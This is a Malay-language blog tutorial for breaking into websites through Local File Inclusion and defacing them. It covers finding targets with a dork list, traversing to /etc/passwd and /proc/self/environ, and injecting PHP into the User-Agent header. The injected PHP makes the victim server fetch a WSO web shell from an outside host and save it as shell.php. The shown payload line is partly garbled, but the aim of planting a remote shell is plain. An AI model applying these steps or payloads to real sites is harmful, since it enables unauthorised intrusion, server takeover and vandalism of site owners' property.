0

UPLOAD SHELL DAN DEFACE DENGAN LFI

Monday, October 27, 2014
Share this Article on :

Assalamualaikum dan salam sejahtera.Hari ini aku nak buat tuto cara nak upload shell dan deface website dengan LFI atau nama penuhnya Local File Inclusion.
Ok jom mula..

1. Mula-mula cari website target.Dork boleh dapatkan di :
http://pastebin.com/rKWHFHVT


2. Lepas dah dapat web target kita kena test pulak.
Katakan lah url web tu macam ni :



http://www.website.com/view.php?page=contact.php

untuk test vuln ke tak, kita buat macam ni :

http://www.website.com/view.php?page=../

tambah ../ kat hujung tu.Kalau vuln, kita akan dapat error :


Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/reaperz/public_html/website.com/view.php on line 1337


Kemungkinan besar web tu vuln LFI.Jom kita test lagi.
Kali ni kita nak cari etc/passwd pulak.
buat macam ni :


http://www.website.com/view.php?page=../etc/passwd

Kita dapat error lagi dan tak ada etc/passwd
Jadi kita naik lagi directory lain.cara nya tambah ../ kat depan



http://www.website.com/view.php?page=../../../etc/passwd


Tambah ../ sampai jumpa etc/passwd
Kalau berjaya kita akan dapat macam ni :


root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin


Yes! tu maksudnya web tu vulnerable kepada LFI.

3. Sekarang masa untuk tengok samaada directory proc/self/environ dapat diakses atau tidak.


Caranya gantikan etc/passwd tadi dengan  proc/self/environ .
Contoh :


http://www.website.com/view.php?page=../../../proc/self/environ

Kalau boleh diakses korang akan dapat error macam ni :

DOCUMENT_ROOT=/home/reaperz/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

Kalau keluar kosong ja, tak ada tulis macam ni, maksudnya direktory proc/self/environ tak dapat diakses ataupun OS yang digunakan ialah FreeBSD.

4. Sekarang masanya untuk kita inject shell kedalam proc/self/environ. Caranya ialah dengan inject code kita melalui User-Agent HTTP Header.

Kita boleh guna add-on Tamper Data yang boleh didapati dalam Mozilla Firefox untuk inject code kita.

Buka Tamper Data dalam firefox (alt+T > Tamper Data).Kemudian click Start Tamper.



Selepas itu buka website target :

http://www.website.com/view.php?page=../../../proc/self/environ

Kemudian akan keluar popup.




Tick Continue Tampering dan click Tamper.Kemudian akan keluar popup lagi :




Isi kotak User-Agent dengan code :

http://shell.reaperz.net/wso.txt -O shell.php’);?>


Kemudian click OK.
Kalau berjaya shell.php akan dihasilkan dalam directory website target kita tadi.

Sekarang masa untuk access shell kita tadi :


http://www.website.com/shell.php


Kalau berjaya shell yang kita inject tadi akan ada.
Itu saja cara untuk upload shell dengan LFI.

Selamat berjaya!

Thank to http://www.reaperz.net/


Artikel Terkait:

0 comments:

Post a Comment